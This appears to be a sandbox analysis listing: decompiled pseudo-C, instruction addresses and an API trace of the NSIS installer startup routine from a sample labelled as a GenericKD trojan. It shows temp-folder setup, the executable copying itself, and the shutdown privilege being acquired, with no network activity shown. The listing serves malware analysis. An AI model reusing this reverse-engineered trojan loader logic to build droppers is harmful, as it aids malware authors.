                                                                                                                          
                                                                                                                          				_t217 = 0x20;
                                                                                                                          				_t189 = 0;
                                                                                                                          				_v24 = 0;
                                                                                                                          				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                          				_v20 = 0;
                                                                                                                          				SetErrorMode(0x8001); // executed
                                                                                                                          				_v324.szCSDVersion = 0;
                                                                                                                          				_v48 = 0;
                                                                                                                          				_v44 = 0;
                                                                                                                          				_v324.dwOSVersionInfoSize = 0x11c;
                                                                                                                          				if(GetVersionExW( &_v324) == 0) {
                                                                                                                          					_v324.dwOSVersionInfoSize = 0x114;
                                                                                                                          					GetVersionExW( &_v324);
                                                                                                                          					asm("sbb eax, eax");
                                                                                                                          					_v42 = 4;
                                                                                                                          					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                                                                          				}
                                                                                                                          				if(_v324.dwMajorVersion < 0xa) {
                                                                                                                          					_v310 = _v310 & 0x00000000;
                                                                                                                          				}
                                                                                                                          				 *0x42a318 = _v324.dwBuildNumber;
                                                                                                                          				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                                                                          				if( *0x42a31e != 0x600) {
                                                                                                                          					_t180 = E00406A35(_t189);
                                                                                                                          					if(_t180 != _t189) {
                                                                                                                          						 *_t180(0xc00);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t232 = "UXTHEME";
                                                                                                                          				do {
                                                                                                                          					E004069C5(_t232); // executed
                                                                                                                          					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                                                                                          				} while ( *_t232 != 0);
                                                                                                                          				E00406A35(0xb);
                                                                                                                          				 *0x42a264 = E00406A35(9);
                                                                                                                          				_t88 = E00406A35(7);
                                                                                                                          				if(_t88 != _t189) {
                                                                                                                          					_t88 =  *_t88(0x1e);
                                                                                                                          					if(_t88 != 0) {
                                                                                                                          						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				__imp__#17();
                                                                                                                          				__imp__OleInitialize(_t189); // executed
                                                                                                                          				 *0x42a320 = _t88;
                                                                                                                          				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                                                                                          				E00406668(0x429260, L"NSIS Error");
                                                                                                                          				_t92 = GetCommandLineW();
                                                                                                                          				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe\" ";
                                                                                                                          				E00406668(_t233, _t92);
                                                                                                                          				_t94 = _t233;
                                                                                                                          				_t234 = 0x22;
                                                                                                                          				 *0x42a260 = 0x400000;
                                                                                                                          				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe\" " - _t234; // 0x22
                                                                                                                          				if(_t251 == 0) {
                                                                                                                          					_t217 = _t234;
                                                                                                                          					_t94 =  &M00435002;
                                                                                                                          				}
                                                                                                                          				_t199 = CharNextW(E00405F64(_t94, _t217));
                                                                                                                          				_v16 = _t199;
                                                                                                                          				while(1) {
                                                                                                                          					_t97 =  *_t199;
                                                                                                                          					_t252 = _t97 - _t189;
                                                                                                                          					if(_t97 == _t189) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t210 = 0x20;
                                                                                                                          					__eflags = _t97 - _t210;
                                                                                                                          					if(_t97 != _t210) {
                                                                                                                          						L17:
                                                                                                                          						__eflags =  *_t199 - _t234;
                                                                                                                          						_v12 = _t210;
                                                                                                                          						if( *_t199 == _t234) {
                                                                                                                          							_v12 = _t234;
                                                                                                                          							_t199 = _t199 + 2;
                                                                                                                          							__eflags = _t199;
                                                                                                                          						}
                                                                                                                          						__eflags =  *_t199 - 0x2f;
                                                                                                                          						if( *_t199 != 0x2f) {
                                                                                                                          							L32:
                                                                                                                          							_t199 = E00405F64(_t199, _v12);
                                                                                                                          							__eflags =  *_t199 - _t234;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								_t199 = _t199 + 2;
                                                                                                                          								__eflags = _t199;
                                                                                                                          							}
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							_t199 = _t199 + 2;
                                                                                                                          							__eflags =  *_t199 - 0x53;
                                                                                                                          							if( *_t199 != 0x53) {
                                                                                                                          								L24:
                                                                                                                          								asm("cdq");
                                                                                                                          								asm("cdq");
                                                                                                                          								_t215 = L"NCRC" & 0x0000ffff;
                                                                                                                          								asm("cdq");
                                                                                                                          								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
                                                                                                                          								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
                                                                                                                          								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                                                                          									L29:
                                                                                                                          									asm("cdq");
                                                                                                                          									asm("cdq");
                                                                                                                          									_t210 = L" /D=" & 0x0000ffff;
                                                                                                                          									asm("cdq");
                                                                                                                          									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
                                                                                                                          									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
                                                                                                                          									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                                                                          										L31:
                                                                                                                          										_t234 = 0x22;
                                                                                                                          										goto L32;
                                                                                                                          									}
                                                                                                                          									__eflags =  *_t199 - _t230;
                                                                                                                          									if( *_t199 == _t230) {
                                                                                                                          										 *(_t199 - 4) = _t189;
                                                                                                                          										__eflags = _t199;
                                                                                                                          										E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology", _t199);
                                                                                                                          										L37:
                                                                                                                          										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                                                          										GetTempPathW(0x400, _t235);
                                                                                                                          										_t116 = E0040360F(_t199, _t252);
                                                                                                                          										_t253 = _t116;
                                                                                                                          										if(_t116 != 0) {
                                                                                                                          											L40:
                                                                                                                          											DeleteFileW(L"1033"); // executed
                                                                                                                          											_t118 = E004030D0(_t255, _v20); // executed
                                                                                                                          											_v8 = _t118;
                                                                                                                          											if(_t118 != _t189) {
                                                                                                                          												L68:
                                                                                                                          												E00403C25();
                                                                                                                          												__imp__OleUninitialize();
                                                                                                                          												if(_v8 == _t189) {
                                                                                                                          													if( *0x42a2f4 == _t189) {
                                                                                                                          														L77:
                                                                                                                          														_t120 =  *0x42a30c;
                                                                                                                          														if(_t120 != 0xffffffff) {
                                                                                                                          															_v24 = _t120;
                                                                                                                          														}
                                                                                                                          														ExitProcess(_v24);
                                                                                                                          													}
                                                                                                                          													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                                                          														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                                                          														_v40.PrivilegeCount = 1;
                                                                                                                          														_v28 = 2;
                                                                                                                          														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                                                                          													}
                                                                                                                          													_t124 = E00406A35(4);
                                                                                                                          													if(_t124 == _t189) {
                                                                                                                          														L75:
                                                                                                                          														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                                                          															goto L77;
                                                                                                                          														}
                                                                                                                          														goto L76;
                                                                                                                          													} else {
                                                                                                                          														_push(0x80040002);
                                                                                                                          														_push(0x25);
                                                                                                                          														_push(_t189);
                                                                                                                          														_push(_t189);
                                                                                                                          														_push(_t189);
                                                                                                                          														if( *_t124() == 0) {
                                                                                                                          															L76:
                                                                                                                          															E0040140B(9);
                                                                                                                          															goto L77;
                                                                                                                          														}
                                                                                                                          														goto L75;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												E00405CC8(_v8, 0x200010);
                                                                                                                          												ExitProcess(2);
                                                                                                                          											}
                                                                                                                          											if( *0x42a27c == _t189) {
                                                                                                                          												L51:
                                                                                                                          												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                                                                          												_v24 = E00403D17(_t265);
                                                                                                                          												goto L68;
                                                                                                                          											}
                                                                                                                          											_t219 = E00405F64(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe\" ", _t189);
                                                                                                                          											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe\" ") {
                                                                                                                          												L48:
                                                                                                                          												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe\" ";
                                                                                                                          												_v8 = L"Error launching installer";
                                                                                                                          												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe\" ") {
                                                                                                                          													_t190 = E00405C33(__eflags);
                                                                                                                          													lstrcatW(_t235, L"~nsu");
                                                                                                                          													__eflags = _t190;
                                                                                                                          													if(_t190 != 0) {
                                                                                                                          														lstrcatW(_t235, "A");
                                                                                                                          													}
                                                                                                                          													lstrcatW(_t235, L".tmp");
                                                                                                                          													_t220 = L"C:\\Users\\Arthur\\Desktop";
                                                                                                                          													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
                                                                                                                          													__eflags = _t138;
                                                                                                                          													if(_t138 == 0) {
                                                                                                                          														L67:
                                                                                                                          														_t189 = 0;
                                                                                                                          														__eflags = 0;
                                                                                                                          														goto L68;
                                                                                                                          													} else {
                                                                                                                          														__eflags = _t190;
                                                                                                                          														_push(_t235);
                                                                                                                          														if(_t190 == 0) {
                                                                                                                          															E00405C16();
                                                                                                                          														} else {
                                                                                                                          															E00405B99();
                                                                                                                          														}
                                                                                                                          														SetCurrentDirectoryW(_t235);
                                                                                                                          														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology"; // 0x43
                                                                                                                          														if(__eflags == 0) {
                                                                                                                          															E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology", _t220);
                                                                                                                          														}
                                                                                                                          														E00406668(0x42b000, _v16);
                                                                                                                          														_t202 = "A" & 0x0000ffff;
                                                                                                                          														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                                                          														__eflags = _t144;
                                                                                                                          														_v12 = 0x1a;
                                                                                                                          														 *0x42b800 = _t144;
                                                                                                                          														do {
                                                                                                                          															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                                                                                          															DeleteFileW(0x420f08);
                                                                                                                          															__eflags = _v8;
                                                                                                                          															if(_v8 != 0) {
                                                                                                                          																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe", 0x420f08, 1);
                                                                                                                          																__eflags = _t149;
                                                                                                                          																if(_t149 != 0) {
                                                                                                                          																	E00406428(_t202, 0x420f08, 0);
                                                                                                                          																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                                                                                          																	_t153 = E00405C4B(0x420f08);
                                                                                                                          																	__eflags = _t153;
                                                                                                                          																	if(_t153 != 0) {
                                                                                                                          																		CloseHandle(_t153);
                                                                                                                          																		_v8 = 0;
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          															 *0x42b800 =  *0x42b800 + 1;
                                                                                                                          															_t61 =  &_v12;
                                                                                                                          															 *_t61 = _v12 - 1;
                                                                                                                          															__eflags =  *_t61;
                                                                                                                          														} while ( *_t61 != 0);
                                                                                                                          														E00406428(_t202, _t235, 0);
                                                                                                                          														goto L67;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												 *_t219 = _t189;
                                                                                                                          												_t222 =  &(_t219[2]);
                                                                                                                          												_t158 = E0040603F(_t264,  &(_t219[2]));
                                                                                                                          												_t265 = _t158;
                                                                                                                          												if(_t158 == 0) {
                                                                                                                          													goto L68;
                                                                                                                          												}
                                                                                                                          												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology", _t222);
                                                                                                                          												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Psychopharmacology", _t222);
                                                                                                                          												_v8 = _t189;
                                                                                                                          												goto L51;
                                                                                                                          											}
                                                                                                                          											asm("cdq");
                                                                                                                          											asm("cdq");
                                                                                                                          											asm("cdq");
                                                                                                                          											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                                                          											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                                                                          											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                                                                          												_t219 = _t219;
                                                                                                                          												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe\" ") {
                                                                                                                          													continue;
                                                                                                                          												}
                                                                                                                          												break;
                                                                                                                          											}
                                                                                                                          											_t189 = 0;
                                                                                                                          											goto L48;
                                                                                                                          										}
                                                                                                                          										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                                                                          										lstrcatW(_t235, L"\\Temp");
                                                                                                                          										_t171 = E0040360F(_t199, _t253);
                                                                                                                          										_t254 = _t171;
                                                                                                                          										if(_t171 != 0) {
                                                                                                                          											goto L40;
                                                                                                                          										}
                                                                                                                          										GetTempPathW(0x3fc, _t235);
                                                                                                                          										lstrcatW(_t235, L"Low");
                                                                                                                          										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                                                                          										SetEnvironmentVariableW(L"TMP", _t235);
                                                                                                                          										_t176 = E0040360F(_t199, _t254);
                                                                                                                          										_t255 = _t176;
                                                                                                                          										if(_t176 == 0) {
                                                                                                                          											goto L68;
                                                                                                                          										}
                                                                                                                          										goto L40;
                                                                                                                          									}
                                                                                                                          									goto L31;
                                                                                                                          								}
                                                                                                                          								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                                                                          								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                                                                          									goto L29;
                                                                                                                          								}
                                                                                                                          								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                                                                          								__eflags = _t178 - 0x20;
                                                                                                                          								if(_t178 == 0x20) {
                                                                                                                          									L28:
                                                                                                                          									_t36 =  &_v20;
                                                                                                                          									 *_t36 = _v20 | 0x00000004;
                                                                                                                          									__eflags =  *_t36;
                                                                                                                          									goto L29;
                                                                                                                          								}
                                                                                                                          								__eflags = _t178 - _t189;
                                                                                                                          								if(_t178 != _t189) {
                                                                                                                          									goto L29;
                                                                                                                          								}
                                                                                                                          								goto L28;
                                                                                                                          							}
                                                                                                                          							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                                                                          							__eflags = _t179 - _t210;
                                                                                                                          							if(_t179 == _t210) {
                                                                                                                          								L23:
                                                                                                                          								 *0x42a300 = 1;
                                                                                                                          								goto L24;
                                                                                                                          							}
                                                                                                                          							__eflags = _t179 - _t189;
                                                                                                                          							if(_t179 != _t189) {
                                                                                                                          								goto L24;
                                                                                                                          							}
                                                                                                                          							goto L23;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					do {
                                                                                                                          						L16:
                                                                                                                          						_t199 = _t199 + 2;
                                                                                                                          						__eflags =  *_t199 - _t210;
                                                                                                                          					} while ( *_t199 == _t210);
                                                                                                                          					goto L17;
                                                                                                                          				}
                                                                                                                          				goto L37;
                                                                                                                          			}



















































                                                                                                                          0x0040364e
                                                                                                                          0x0040364f
                                                                                                                          0x00403656
                                                                                                                          0x00403659
                                                                                                                          0x00403660
                                                                                                                          0x00403663
                                                                                                                          0x00403676
                                                                                                                          0x0040367c
                                                                                                                          0x0040367f
                                                                                                                          0x00403682
                                                                                                                          0x00403690
                                                                                                                          0x00403698
                                                                                                                          0x004036a3
                                                                                                                          0x004036bc
                                                                                                                          0x004036be
                                                                                                                          0x004036c6
                                                                                                                          0x004036c6
                                                                                                                          0x004036d1
                                                                                                                          0x004036d3
                                                                                                                          0x004036d3
                                                                                                                          0x004036e8
                                                                                                                          0x0040370d
                                                                                                                          0x0040371b
                                                                                                                          0x0040371e
                                                                                                                          0x00403725
                                                                                                                          0x0040372c
                                                                                                                          0x0040372c
                                                                                                                          0x00403725
                                                                                                                          0x0040372e
                                                                                                                          0x00403733
                                                                                                                          0x00403734
                                                                                                                          0x00403740
                                                                                                                          0x00403744
                                                                                                                          0x0040374b
                                                                                                                          0x00403759
                                                                                                                          0x0040375e
                                                                                                                          0x00403765
                                                                                                                          0x00403769
                                                                                                                          0x0040376d
                                                                                                                          0x0040376f
                                                                                                                          0x0040376f
                                                                                                                          0x0040376d
                                                                                                                          0x00403776
                                                                                                                          0x0040377d
                                                                                                                          0x00403783
                                                                                                                          0x0040379b
                                                                                                                          0x004037ab
                                                                                                                          0x004037b0
                                                                                                                          0x004037b6
                                                                                                                          0x004037bd
                                                                                                                          0x004037c4
                                                                                                                          0x004037c6
                                                                                                                          0x004037c7
                                                                                                                          0x004037d1
                                                                                                                          0x004037d8
                                                                                                                          0x004037da
                                                                                                                          0x004037dc
                                                                                                                          0x004037dc
                                                                                                                          0x004037ef
                                                                                                                          0x004037f1
                                                                                                                          0x004038eb
                                                                                                                          0x004038eb
                                                                                                                          0x004038ee
                                                                                                                          0x004038f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004037fb
                                                                                                                          0x004037fc
                                                                                                                          0x004037ff
                                                                                                                          0x00403808
                                                                                                                          0x00403808
                                                                                                                          0x0040380b
                                                                                                                          0x0040380e
                                                                                                                          0x00403811
                                                                                                                          0x00403814
                                                                                                                          0x00403814
                                                                                                                          0x00403814
                                                                                                                          0x00403815
                                                                                                                          0x00403819
                                                                                                                          0x004038d9
                                                                                                                          0x004038e2
                                                                                                                          0x004038e4
                                                                                                                          0x004038e7
                                                                                                                          0x004038ea
                                                                                                                          0x004038ea
                                                                                                                          0x004038ea
                                                                                                                          0x00000000
                                                                                                                          0x0040381f
                                                                                                                          0x00403820
                                                                                                                          0x00403821
                                                                                                                          0x00403825
                                                                                                                          0x0040383f
                                                                                                                          0x00403846
                                                                                                                          0x00403859
                                                                                                                          0x0040385a
                                                                                                                          0x0040386f
                                                                                                                          0x00403874
                                                                                                                          0x00403876
                                                                                                                          0x00403878
                                                                                                                          0x00403894
                                                                                                                          0x0040389b
                                                                                                                          0x004038ae
                                                                                                                          0x004038af
                                                                                                                          0x004038c4
                                                                                                                          0x004038ca
                                                                                                                          0x004038cc
                                                                                                                          0x004038ce
                                                                                                                          0x004038d6
                                                                                                                          0x004038d8
                                                                                                                          0x00000000
                                                                                                                          0x004038d8
                                                                                                                          0x004038d2
                                                                                                                          0x004038d4
                                                                                                                          0x004038f9
                                                                                                                          0x004038fd
                                                                                                                          0x00403906
                                                                                                                          0x0040390b
                                                                                                                          0x00403911
                                                                                                                          0x0040391c
                                                                                                                          0x0040391e
                                                                                                                          0x00403923
                                                                                                                          0x00403925
                                                                                                                          0x0040397d
                                                                                                                          0x00403982
                                                                                                                          0x0040398b
                                                                                                                          0x00403992
                                                                                                                          0x00403995
                                                                                                                          0x00403b6c
                                                                                                                          0x00403b6c
                                                                                                                          0x00403b71
                                                                                                                          0x00403b7a
                                                                                                                          0x00403b97
                                                                                                                          0x00403c0f
                                                                                                                          0x00403c0f
                                                                                                                          0x00403c17
                                                                                                                          0x00403c19
                                                                                                                          0x00403c19
                                                                                                                          0x00403c1f
                                                                                                                          0x00403c1f
                                                                                                                          0x00403bae
                                                                                                                          0x00403bba
                                                                                                                          0x00403bcb
                                                                                                                          0x00403bd2
                                                                                                                          0x00403bd9
                                                                                                                          0x00403bd9
                                                                                                                          0x00403be1
                                                                                                                          0x00403bed
                                                                                                                          0x00403bfb
                                                                                                                          0x00403c06
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403bef
                                                                                                                          0x00403bef
                                                                                                                          0x00403bf0
                                                                                                                          0x00403bf2
                                                                                                                          0x00403bf3
                                                                                                                          0x00403bf4
                                                                                                                          0x00403bf9
                                                                                                                          0x00403c08
                                                                                                                          0x00403c0a
                                                                                                                          0x00000000
                                                                                                                          0x00403c0a
                                                                                                                          0x00000000
                                                                                                                          0x00403bf9
                                                                                                                          0x00403bed
                                                                                                                          0x00403b84
                                                                                                                          0x00403b8b
                                                                                                                          0x00403b8b
                                                                                                                          0x004039a1
                                                                                                                          0x00403a48
                                                                                                                          0x00403a48
                                                                                                                          0x00403a54
                                                                                                                          0x00000000
                                                                                                                          0x00403a54
                                                                                                                          0x004039b2
                                                                                                                          0x004039ba
                                                                                                                          0x00403a0c
                                                                                                                          0x00403a0c
                                                                                                                          0x00403a12
                                                                                                                          0x00403a19
                                                                                                                          0x00403a67
                                                                                                                          0x00403a69
                                                                                                                          0x00403a6e
                                                                                                                          0x00403a70
                                                                                                                          0x00403a78
                                                                                                                          0x00403a78
                                                                                                                          0x00403a83
                                                                                                                          0x00403a88
                                                                                                                          0x00403a8f
                                                                                                                          0x00403a95
                                                                                                                          0x00403a97
                                                                                                                          0x00403b6a
                                                                                                                          0x00403b6a
                                                                                                                          0x00403b6a
                                                                                                                          0x00000000
                                                                                                                          0x00403a9d
                                                                                                                          0x00403a9d
                                                                                                                          0x00403a9f
                                                                                                                          0x00403aa0
                                                                                                                          0x00403aa9
                                                                                                                          0x00403aa2
                                                                                                                          0x00403aa2
                                                                                                                          0x00403aa2
                                                                                                                          0x00403aaf
                                                                                                                          0x00403ab7
                                                                                                                          0x00403abe
                                                                                                                          0x00403ac6
                                                                                                                          0x00403ac6
                                                                                                                          0x00403ad3
                                                                                                                          0x00403adf
                                                                                                                          0x00403ae9
                                                                                                                          0x00403ae9
                                                                                                                          0x00403aeb
                                                                                                                          0x00403af2
                                                                                                                          0x00403afc
                                                                                                                          0x00403b08
                                                                                                                          0x00403b0e
                                                                                                                          0x00403b14
                                                                                                                          0x00403b17
                                                                                                                          0x00403b21
                                                                                                                          0x00403b27
                                                                                                                          0x00403b29
                                                                                                                          0x00403b2d
                                                                                                                          0x00403b3e
                                                                                                                          0x00403b44
                                                                                                                          0x00403b49
                                                                                                                          0x00403b4b
                                                                                                                          0x00403b4e
                                                                                                                          0x00403b54
                                                                                                                          0x00403b54
                                                                                                                          0x00403b4b
                                                                                                                          0x00403b29
                                                                                                                          0x00403b57
                                                                                                                          0x00403b5e
                                                                                                                          0x00403b5e
                                                                                                                          0x00403b5e
                                                                                                                          0x00403b5e
                                                                                                                          0x00403b65
                                                                                                                          0x00000000
                                                                                                                          0x00403b65
                                                                                                                          0x00403a97
                                                                                                                          0x00403a1b
                                                                                                                          0x00403a1e
                                                                                                                          0x00403a22
                                                                                                                          0x00403a27
                                                                                                                          0x00403a29
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403a35
                                                                                                                          0x00403a40
                                                                                                                          0x00403a45
                                                                                                                          0x00000000
                                                                                                                          0x00403a45
                                                                                                                          0x004039c3
                                                                                                                          0x004039db
                                                                                                                          0x004039ec
                                                                                                                          0x004039ed
                                                                                                                          0x004039f1
                                                                                                                          0x004039f3
                                                                                                                          0x00403a01
                                                                                                                          0x00403a08
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403a08
                                                                                                                          0x00403a0a
                                                                                                                          0x00000000
                                                                                                                          0x00403a0a
                                                                                                                          0x0040392d
                                                                                                                          0x00403939
                                                                                                                          0x0040393e
                                                                                                                          0x00403943
                                                                                                                          0x00403945
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040394d
                                                                                                                          0x00403955
                                                                                                                          0x00403966
                                                                                                                          0x0040396e
                                                                                                                          0x00403970
                                                                                                                          0x00403975
                                                                                                                          0x00403977
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403977
                                                                                                                          0x00000000
                                                                                                                          0x004038d4
                                                                                                                          0x0040387d
                                                                                                                          0x0040387f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403881
                                                                                                                          0x00403885
                                                                                                                          0x00403889
                                                                                                                          0x00403890
                                                                                                                          0x00403890
                                                                                                                          0x00403890
                                                                                                                          0x00403890
                                                                                                                          0x00000000
                                                                                                                          0x00403890
                                                                                                                          0x0040388b
                                                                                                                          0x0040388e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040388e
                                                                                                                          0x00403827
                                                                                                                          0x0040382b
                                                                                                                          0x0040382e
                                                                                                                          0x00403835
                                                                                                                          0x00403835
                                                                                                                          0x00000000
                                                                                                                          0x00403835
                                                                                                                          0x00403830
                                                                                                                          0x00403833
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403833
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403801
                                                                                                                          0x00403801
                                                                                                                          0x00403802
                                                                                                                          0x00403803
                                                                                                                          0x00403803
                                                                                                                          0x00000000
                                                                                                                          0x00403801
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                                                          • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                                                          • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                                                          • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                                                          • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe" ,00000000), ref: 004037E9
                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                                                            • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe" ,00000000,?), ref: 00403A8F
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                                                          • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,00420F08,00000001), ref: 00403B21
                                                                                                                          • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                                                          • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
